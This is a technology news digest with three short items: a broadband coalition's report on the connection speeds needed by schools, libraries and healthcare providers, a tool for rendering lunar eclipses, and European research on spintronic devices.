A new report from the Schools, Health and Libraries Broadband (SHLB) Coalition says that schools, libraries, and healthcare providers in the United States need broadband speeds of 100 Mbps to 1 Gbps to adequately serve their customers' needs. The SHLB Coalition, which features 28 members, including the New America Foundation, the American Library Association, Internet 2, and Educause, is urging U.S. federal, state, and local governments to seriously consider the needs of libraries, schools, and healthcare providers when developing broadband deployment plans. "High-speed broadband is the key infrastructure that K-12 schools, universities, libraries, hospitals, clinics, and other healthcare providers need to provide 21st-century education, information, and health services," says SHLB coordinator John Windhausen. The institutions are core elements of communities, and affordable, high-speed broadband will help both their immediate customers and surrounding neighborhoods through shared networks, says New America Foundation Wireless Future Program director Michael Calabrese. "The most promising public investment, given limited resources, would be high-capacity fiber networks connecting community anchor institutions in every local jurisdiction," Calabrese says. "By becoming both technology hubs and bringing fiber deep into every community, schools, libraries, and healthcare providers will [bring] affordable broadband access to everyone."

Moon Magic: Researchers Develop New Tool to Visualize Past, Future Lunar Eclipses

Researchers at Rensselaer Polytechnic Institute have created a model that can generate picture-perfect images of lunar eclipses. Professor Barbara Cutler assisted graduate student Theodore C. Yapo with configuring and combining models for sunlight, the solar system, and the different layers and effects of the Earth's atmosphere to simulate and render a visualization of a lunar eclipse. The tool can show how famous eclipses in history look, how future ones will look, and how they would appear to someone in New York, Rome, or from any other geographical location on Earth.
Cutler and Yapo say it is almost impossible to distinguish the computer-generated images of eclipses from actual photos. "Other researchers have rendered the night sky, the moon, and sunsets, but this is the first time anyone has rendered lunar eclipses," Cutler says. "Our models may help with investigations into historical atmospheric phenomena, and they could also be of interest to artists looking to add this special effect to their toolbox."

Spintronic - The New Electronic

European researchers working on the Nanospin project have developed spintronic devices using ferromagnetic semiconductors. Although still in development, spintronics has already led to faster, instant-on technology and massive increases in data storage capacity. Spintronic devices also use little power and are highly scalable. "It takes a very low current to switch spin, which makes these devices very efficient," says Nanospin co-coordinator Charles Gould. He also says that, theoretically, spintronic devices could have very high switching speeds. "We have not proven this in the lab yet, but many results in the theory have already been proven, so high switching speeds [are quite likely]," Gould says. The Nanospin project sought to achieve four objectives: writing information to ferromagnetic semiconductors, retrieving that information, switching between different states at high speeds, and the theoretical modeling of the devices to explain their operation and optimize performance. The researchers say the project was successful on all accounts. "Currently, we are looking at logic schemes for spintronics, so we are moving from memory and storage to processing," Gould says.
